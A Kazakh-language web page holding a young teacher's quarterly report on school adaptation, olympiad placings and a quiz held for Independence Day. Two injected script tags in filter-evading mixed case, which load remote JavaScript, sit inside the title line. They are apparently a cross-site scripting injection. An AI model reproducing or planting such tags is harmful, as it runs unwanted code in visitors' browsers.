Жас маман Оразалы Темірлан Жаналыұлының тоқсандық есебі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.01.2020

            Екінші тоқсан мен үшін, жас маман үшін жаман емес өтті деп айтуға болады.

         Біріншіден, ол мектептегі бейімделу өзімнің көздегенімдей оңай, ойдағыдай өтіп жатыр. Екіншіден, алғаш кішігірім жетістіктер пайда бола бастады. Бейімделу келсек, жұмыс үйреншікті болып, оның көптеген аспектіліері енді түсінікті. Әрине бұл тәлімгер жәнеде тәжірибелі мұғалімдердің арқасында, олардың ықпалы жәнеде көмегі жақсы жағына әсер етті.

       Тоқсан басындағы қойған мақсаттарма жеттім деп ойлаймын. Келесі тоқсанда өзімнің біліктілігімді одан әрі арттырып, білімімді жаңа ақпараттарымен толықтыруға ынталанамын. Жетістіктерге келсек желтоқсан айында Қазақстан интернет олимпидаларына қатысып, келесі орындарды иелендім: Қазақстан тарихы пәнінен аудан бойынша 3 орын, Адам. Қоғам. Құқық. пәнінен аудан бойынша 1 орын, облыс бойынша 2 орын.

        13 желтоқсан Тәуелсіздік күніне орай алғашқы әскери дайындық пәнінен 10-11 сыныптар арасында «АӘД пәнінің білгірі» атты викторина өткіздім. Оқушылар белсене қатысып, білімдерін, тапқырлықтарын көрсете білді. Сайыстың қорытындысы нәтижесінде жеңімпаз команалар анықталып, грамоталар мен сыйлықтармен марапатталды. 

         Мектеп ішінде өз  білімді кеңейту мақсатында тәжірибелі мұғалімдерінің  сабақтарына кірдім. Сабақтарда АКТ технологияларды қалай қолдану және дұрыс пайдалану тәсілдерімен таныстым.

Просмотров: 768


Пікір қосу



Деректерді қолтаңбаға қосу